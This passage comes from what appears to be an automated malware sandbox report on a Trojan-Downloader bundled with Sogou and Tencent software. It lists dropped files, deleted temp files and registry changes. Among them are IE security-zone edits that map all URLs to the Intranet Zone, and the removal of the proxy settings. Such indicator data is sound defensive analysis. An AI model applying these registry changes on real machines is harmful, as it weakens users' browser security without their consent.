%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smalldlg_shadow.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_nor.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\check.png (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Èí¼þÖúÊÖ\жÔØÈí¼þÖúÊÖ.lnk (501 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\bottombk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_sel.png (347 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\4.png (18 bytes)
%Program Files%\SogouSoftware\update\SogouPDAInfo.sqlite3 (3624 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\classify_btn_pushed.png (130 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\apostrophe.gif (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_normal.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\soft_search_list.xml (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\group_list_item.xml (693 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\downloading.gif (7 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button140.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_normal.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\allow_debug.png (2712 bytes)
%Program Files%\SogouSoftware\Èí¼þÖúÊÖ.lnk (1284 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_dwn.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DIFxAPI.dll (12309 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\left_btn_mask.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tab.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menubtn.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\wait_dev.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_confirm.png (632 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_fore.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_act.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\Õýʽ°æÑ¡ÖÐ״̬.png (15476 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\all_updated.png (9 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_bind_checkbox.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_act.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\connect_dev.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\uninstall_list_item.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_act.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_dwn.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\shy.png (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_info.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ApkTool.xml (1568 bytes)
%Program Files%\SogouSoftware\3.1.13.79\CommonState.dll (1332 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\continuebtn_small.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_ignore_list_item.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_bk.png (17660 bytes)
%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll (8748 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\dlgshadow.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\icon_success.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\downloadComplete_list_item.xml (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_normal_dlg.png (415 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_title.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\down_smt.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_left.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\SogouSoftware.dll (25317 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouApkTool.exe (47860 bytes)
%Documents and Settings%\All Users\Desktop\Èí¼þÖúÊÖ.lnk (720 bytes)
%Program Files%\SogouSoftware\manifest.cfg (30 bytes)
%Program Files%\SogouSoftware\3.1.13.79\sqlite3.dll (10053 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_app2phone_arrow.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\AdbWinApi.dll (4250 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\1.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu_bk.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_simple_up.png (15 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\IEHint64.dll (10878 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_dwn.png (18 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Èí¼þÖúÊÖ\Èí¼þÖúÊÖ.lnk (734 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tab_bk.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\tooltip.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\default_pkgicon.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\npdownload64.dll (9079 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_unconnected.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_mid.png (939 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\7.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\GIF\loading.gif (494 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\setting_dwn.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_act.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress.gif (9 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\warning_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\3.0.0.0\SogouPDAInfo.sqlite3 (3624 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_dwn.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\btn_3state.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_fore.gif (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\confirm_closebtn.png (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_fore.png (15817 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\download_bind_list_item.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_thu.png (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\dlg_settings.xml (6 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo4848default.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_hand.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_trs.png (938 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_list_dlg.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_simple.png (285 bytes)
%Program Files%\SogouSoftware\3.1.13.79\DuiLib.dll (17602 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_dlg_otherfont.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\2.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ready_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\progress_pause.png (17448 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\6.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\9 .png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon2.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smallbtn_shadow.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\web_external_browser_dlg.xml (318 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\tooltips_dlg.xml (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\download_list_item.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_app2phone.png (16 bytes)
%Program Files%\SogouSoftware\uninst.exe (794 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_banner.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\3.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\loading.gif (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\checkbox.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\ScrollBar\scroll.png (13 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\magnifier_search.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\8.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\feedback_act.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_active.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\bigbtn_shadow.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\install_driver.gif (1568 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tips.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\apk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\finishbtn.png (817 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouAapt.exe (24085 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button160.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\confirm_bk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\Ñ¡ÖÐ̬.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_5.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\APKlogo.ico (2610 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu_item.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_dlg.xml (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_4.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_nor.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\MySoftwareManager.xml (24 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_ready.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_bar_act_focus.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\guide_smt.png (2712 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\download_bind_bg.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\phone_connected.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\adbdll.dll (2430 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_confirm_dlg.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\button.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\android_ver.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn.png (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ConfirmDlg.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\close_search.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DIFxAPI.dll (11174 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\recommend_classify_table.xml (4 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\item_icon_3.png (1 bytes)

The Trojan-Downloader deletes the following file(s):

%Program Files%\SogouSoftware\Èí¼þÖúÊÖ.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\System.dll (0 bytes)

The process QBDownload.exe:2504 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (556 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe (2868107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qbdrf\dr.dll (83 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\Report.Ini (511 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\qbdrf (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qbdrf\dr.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe (0 bytes)

The process regsvr32.exe:808 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%System%\GroupPolicy\gpt.ini (315 bytes)
%System%\GroupPolicy\Machine\Registry.pol (268 bytes)

The process TsService.exe:3568 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (152 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)

The process SuiteDownloader20160222153349.exe:1488 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\QBDownload.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QQPCDownload8889533.exe (7972 bytes)

Registry activity

The process QQPCMgr_Setup.exe:2796 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 8A CF 9E 81 3F 54 80 DA 8A 98 E8 08 D5 C2 41"

[HKLM\SOFTWARE\Tencent\QQPCMgr]
"SupplyID" = "8889533"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\qmgcfiles\Shell\open\Command]
"(Default)" = "%Program Files%\Tencent\QQPCMgr\11.5.17499.219\\QMDeskTopGC.exe /file=%1"

The process SogouSoftware.exe:216 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1460984650"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKU\S-1-5-19\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"SuiteDownloader20160222153349.exe" = "SuiteDownloader20160222153349"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKU\S-1-5-20_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\SogouSoftware]
"FirstRun" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SogouSoftware.exe"

[HKU\S-1-5-20\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"

[HKU\S-1-5-19\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"

[HKU\.DEFAULT\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware\tmp]
"ExternalApp.exe" = "软件助手安装包"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012016051920160520\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKU\S-1-5-20\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 C1 DC 11 16 E5 C8 C0 34 54 72 48 3F 61 CC 7C"

[HKU\S-1-5-19_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Classes\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016051920160520]
"CachePrefix" = ":2016051920160520:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\SogouDownload]
"WiFi-2175.exe" = "WiFi共享大师"

[HKU\S-1-5-19_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"UITotalShowTime" = "1"

[HKU\S-1-5-20_CLASSES\SOFTWARE\SogouSoftware\Download\BindSoft\QQBrowser]
"ShowUITime" = "Type: REG_QWORD, Length: 8"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QQBrowserLiveup.exe:1808 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA D1 CB 57 C9 56 3B 06 90 98 96 14 8C FD E3 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

